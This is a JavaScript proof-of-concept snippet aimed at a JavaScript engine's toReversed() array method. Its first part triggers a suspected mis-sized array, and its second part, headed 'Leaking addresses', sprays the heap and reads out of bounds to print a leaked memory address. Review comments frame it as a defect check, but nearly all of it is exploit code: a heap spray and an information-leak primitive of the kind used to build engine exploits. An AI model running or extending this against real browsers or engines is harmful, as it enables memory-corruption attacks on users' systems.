// 1. Trigger: Array.prototype.toReversed() on a one-element BigInt array.
//    print(), describe() and sleepSeconds() are not defined in this snippet;
//    presumably they are helpers provided by the engine's test shell.
const v1 = [-1n]; // one-element array holding a BigInt
let v2;
v2 = v1.toReversed(); // result should be a fresh array of length 1
print(describe(v2)); // shell helper; presumably dumps the engine's view of v2
sleepSeconds(5); // shell helper; pauses execution before the read below
// v2 has length 1, so on a correctly behaving engine v2[2] is undefined and
// calling .print() on it throws a TypeError. Any other outcome means the
// engine returned a mis-sized array, which is the defect this snippet checks for.
print(v2[2].print());
// 2 Leaking addresses
/**
 * Allocate a 4 MiB typed array and drop it immediately.
 * The only intent is to put pressure on the allocator; nothing is returned.
 * NOTE(review): the name shadows any shell-provided gc() builtin, if one exists.
 */
function gc() {
  const bytes = 4 * 1024 * 1024;
  void new Uint8Array(bytes);
}
// 2. Address-leak check.
let spray_arr = new Array(0x20); // created with length 0x20 ...
for (let i = 0; i < 0x40; i++) { // ... but filled to 0x40 entries, so the array grows during the loop
spray_arr[i] = [2.1*i, 2.2, 2.3]; // each entry is a small array of doubles
}
gc(); // allocate a large buffer so later allocations land in disturbed heap (see gc() above)
b1 = [1.1]; // NOTE(review): assigned without let/const — an implicit global, so this is a sloppy-mode script
b1 = b1.toReversed(); // should again be a fresh array of length 1
// b1 has length 1, so b1[1] is undefined on a correct engine; a numeric value
// here means the returned array is mis-sized. f2i() and hex() are not defined
// in this snippet — presumably number-formatting helpers from elsewhere.
let addr1 = f2i(b1[1]);
print ("leak1: " + hex(addr1));